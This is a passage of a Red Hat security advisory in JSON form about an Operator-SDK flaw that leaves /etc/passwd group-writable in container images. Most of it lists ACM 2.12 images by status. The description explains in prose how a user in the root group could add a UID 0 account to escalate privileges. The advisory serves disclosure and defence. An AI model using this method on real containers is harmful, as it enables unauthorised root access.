"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376300"
}
],
"notes": [
{
"category": "description",
"text": "Early versions of Operator-SDK provided an insecure method to allow operator containers to run in environments that used a random UID. Operator-SDK before 0.15.2 provided a script, user_setup, which modifies the permissions of the /etc/passwd file to 664 during build time. Developers who used Operator-SDK before 0.15.2 to scaffold their operator may still be impacted by this if the insecure user_setup script is still being used to build new container images. \n\nIn affected images, the /etc/passwd file is created during build time with group-writable permissions and a group ownership of root (gid=0). An attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "operator-sdk: privilege escalation due to incorrect permissions of /etc/passwd",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security has rated this vulnerability as moderate severity for affected products which run on OpenShift. The vulnerability allows for potential privilege escalation within a container, but OpenShift\u0027s default, multi-layered security posture effectively mitigates this risk. \n\nThe primary controls include the default Security Context Constraints (SCC), which severely limit a container\u0027s permissions from the start, and SELinux, which enforces mandatory access control to ensure strict isolation. While other container runtime environments may have different controls available and require case-by-case analysis, OpenShift\u0027s built-in defenses are designed to prevent this type of attack.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
